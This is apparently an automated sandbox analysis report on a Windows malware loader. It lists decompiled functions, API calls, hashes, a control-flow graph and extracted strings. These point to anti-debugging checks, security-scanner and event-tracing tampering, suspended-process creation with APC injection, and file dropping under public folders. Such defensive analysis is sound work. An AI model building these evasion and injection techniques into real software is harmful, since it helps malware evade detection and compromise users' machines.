                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$QueueThread
                                                                      • String ID: NtQueueApcThread$ntdll
                                                                      • API String ID: 3075473611-1374908105
                                                                      • Opcode ID: e7c63140f187a9092040aa147447c2e89249373a7f3fbebcd8e6aa7318ba3267
                                                                      • Instruction ID: 3d36399bf48912f6f9f7ef60d83d775a31bf0cbf4bb174b9eee4f790d31fcf17
                                                                      • Opcode Fuzzy Hash: e7c63140f187a9092040aa147447c2e89249373a7f3fbebcd8e6aa7318ba3267
                                                                      • Instruction Fuzzy Hash: 5DE0B6B278020ABF9B40EFD8D855D9B7BECAB082447004610FA1AD3211C730E8219B60
                                                                      Function 02CADBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlI.N(?,?,00000000,02CADC7E), ref: 02CADC2C
                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC42
                                                                      • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC61
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Path$DeleteFileNameName_
                                                                      • String ID:
                                                                      • API String ID: 4284456518-0
                                                                      • Opcode ID: 456a3db5296e19264c740f689f009c9207b67a7aa33330165e20f29c7bb1e077
                                                                      • Instruction ID: ff58344bc7af927876dea10dcaa8385424d9cd80a851767059b394376d6947be
                                                                      • Opcode Fuzzy Hash: 456a3db5296e19264c740f689f009c9207b67a7aa33330165e20f29c7bb1e077
                                                                      • Instruction Fuzzy Hash: E701D63594460E6EEB05EBA0DD51FCD77BDBB4470CF5004E2D202F7481DAB4AB049B64
                                                                      Function 02CADC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02C94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C94F2E
                                                                      • RtlI.N(?,?,00000000,02CADC7E), ref: 02CADC2C
                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC42
                                                                      • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02CADC7E), ref: 02CADC61
                                                                        • Part of subcall function 02C94C60: SysFreeString.OLEAUT32(02CAF4A4), ref: 02C94C6E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                      • String ID:
                                                                      • API String ID: 1530111750-0
                                                                      • Opcode ID: af7a62535fb99b8544d8620277c483f42acb604e6f2c9996a8c2abe9f9592412
                                                                      • Instruction ID: d4c843bdd1a472036338ef846e09040637caaaba90aefe9668ae6fb788ec3b5d
                                                                      • Opcode Fuzzy Hash: af7a62535fb99b8544d8620277c483f42acb604e6f2c9996a8c2abe9f9592412
                                                                      • Instruction Fuzzy Hash: 8801447594020DBEDB11EBA0DD56FCDB3BDEB48708F5044B1E201E2580EB746B049A64
                                                                      Function 02CA6DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 02CA6D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02CA6DB9,?,?,?,00000000), ref: 02CA6D99
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,02CA6EAC,00000000,00000000,02CA6E2B,?,00000000,02CA6E9B), ref: 02CA6E17
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFromInstanceProg
                                                                      • String ID:
                                                                      • API String ID: 2151042543-0
                                                                      • Opcode ID: d9648c45be49d056e58e5dbe337f44fb2457ab730a634f94cd2b75c033573853
                                                                      • Instruction ID: be568edf0dcb4896a2a9513be8c4e027b92522a1e6f4e2fe4c7785ff4da887d1
                                                                      • Opcode Fuzzy Hash: d9648c45be49d056e58e5dbe337f44fb2457ab730a634f94cd2b75c033573853
                                                                      • Instruction Fuzzy Hash: 38012671608749AEFF15EFA1DC3286FBBBDE74AB04F610835F405E2680E6319900D860
                                                                      Function 02CAF7C8 Relevance: 229.6, APIs: 8, Strings: 118, Instructions: 9071COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InetIsOffline.URL(00000000,00000000,02CBB784,?,?,?,00000000,00000000), ref: 02CAF801
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                        • Part of subcall function 02CAF6E8: GetModuleHandleW.KERNEL32(KernelBase,?,02CAFAEB,UacInitialize,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,Initialize), ref: 02CAF6EE
                                                                        • Part of subcall function 02CAF6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CAF700
                                                                        • Part of subcall function 02CAF744: GetModuleHandleW.KERNEL32(KernelBase), ref: 02CAF754
                                                                        • Part of subcall function 02CAF744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CAF766
                                                                        • Part of subcall function 02CAF744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CAF77D
                                                                        • Part of subcall function 02C97E5C: GetFileAttributesA.KERNEL32(00000000,?,02CB041F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,UacInitialize), ref: 02C97E67
                                                                        • Part of subcall function 02C9C364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E0B8B8,?,02CB0751,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession), ref: 02C9C37B
                                                                        • Part of subcall function 02CADD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADE40), ref: 02CADDAB
                                                                        • Part of subcall function 02CADD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02CADE40), ref: 02CADDDB
                                                                        • Part of subcall function 02CADD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02CADDF0
                                                                        • Part of subcall function 02CADD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02CADE1C
                                                                        • Part of subcall function 02CADD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02CADE25
                                                                        • Part of subcall function 02C97E80: GetFileAttributesA.KERNEL32(00000000,?,02CB356F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,Initialize), ref: 02C97E8B
                                                                        • Part of subcall function 02C98048: CreateDirectoryA.KERNEL32(00000000,00000000,?,02CB370D,OpenSession,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,Initialize,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8), ref: 02C98055
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                                      • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                                      • API String ID: 297057983-2894825931
                                                                      • Opcode ID: e9f4dbb8c3b039d86cdbbe10f438983c8f611bb60c4c75f33c51a63545fa7f67
                                                                      • Instruction ID: 41d9abfa6b14bcae32204df12f2d3e8f5590fb1d3d037664345dbbb86328a7ca
                                                                      • Opcode Fuzzy Hash: e9f4dbb8c3b039d86cdbbe10f438983c8f611bb60c4c75f33c51a63545fa7f67
                                                                      • Instruction Fuzzy Hash: 2A142775A0411D9FDF35EBA4DC94ACE73BABF89304F1041E1E409AB614DA30AE92EF51
                                                                      Function 02CB8128 Relevance: 163.8, APIs: 5, Strings: 87, Instructions: 2778processthreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 4574 2cb8128-2cb8517 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c948ec 4689 2cb851d-2cb86f0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c947ec call 2c949a0 call 2c94d74 call 2c94df0 CreateProcessAsUserW 4574->4689 4690 2cb93a1-2cb9524 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c948ec 4574->4690 4797 2cb876e-2cb8879 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 4689->4797 4798 2cb86f2-2cb8769 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 4689->4798 4779 2cb952a-2cb9539 call 2c948ec 4690->4779 4780 2cb9cf5-2cbb2fa call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 * 16 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2c946d4 * 2 call 2ca89d0 call 2ca7c10 call 2ca8338 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 ExitProcess 4690->4780 4779->4780 4788 2cb953f-2cb9812 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2caf094 call 2c94860 call 2c949a0 call 2c946d4 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c97e5c 4779->4788 5046 2cb9818-2cb9aea call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2cae358 call 2c94530 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94de0 * 2 call 2c94764 call 2cadc8c 4788->5046 5047 2cb9aef-2cb9cf0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c949f8 call 2ca8d70 4788->5047 4899 2cb887b-2cb887e 4797->4899 4900 2cb8880-2cb8ba0 call 2c949f8 call 2cade50 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2cad164 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 4797->4900 4798->4797 4899->4900 5217 2cb8bb9-2cb939c call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 ResumeThread call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 CloseHandle call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2ca8080 call 2ca894c * 6 CloseHandle call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 call 2c94860 call 2c949a0 call 2c946d4 call 2c947ec call 2c949a0 call 2c946d4 call 2ca89d0 4900->5217 5218 2cb8ba2-2cb8bb4 call 2ca8730 4900->5218 5046->5047 5047->4780 5217->4690 5218->5217
                                                                      APIs
                                                                        • Part of subcall function 02CA89D0: FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                      • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E0B7E0,02E0B824,OpenSession,02D17380,02CBB7B8,UacScan,02D17380), ref: 02CB86E9
                                                                      • ResumeThread.KERNEL32(00000BEC,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8), ref: 02CB8D33
                                                                        • Part of subcall function 02CA8730: NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02CA8761
                                                                      • CloseHandle.KERNEL32(00000BF8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,00000BEC,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380), ref: 02CB8EB2
                                                                        • Part of subcall function 02CA894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,UacScan), ref: 02CA8960
                                                                        • Part of subcall function 02CA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA897A
                                                                        • Part of subcall function 02CA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize), ref: 02CA89B6
                                                                      • CloseHandle.KERNEL32(00000BF8,00000BF8,ScanBuffer,02D17380,02CBB7B8,UacInitialize,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,UacScan,02D17380), ref: 02CB92A4
                                                                        • Part of subcall function 02C97E5C: GetFileAttributesA.KERNEL32(00000000,?,02CB041F,ScanString,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,UacScan,02D17380,02CBB7B8,UacInitialize), ref: 02C97E67
                                                                        • Part of subcall function 02CADC8C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADD5E), ref: 02CADCCB
                                                                        • Part of subcall function 02CADC8C: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CADD05
                                                                        • Part of subcall function 02CADC8C: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CADD32
                                                                        • Part of subcall function 02CADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CADD3B
                                                                        • Part of subcall function 02CA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CA83C2), ref: 02CA83A4
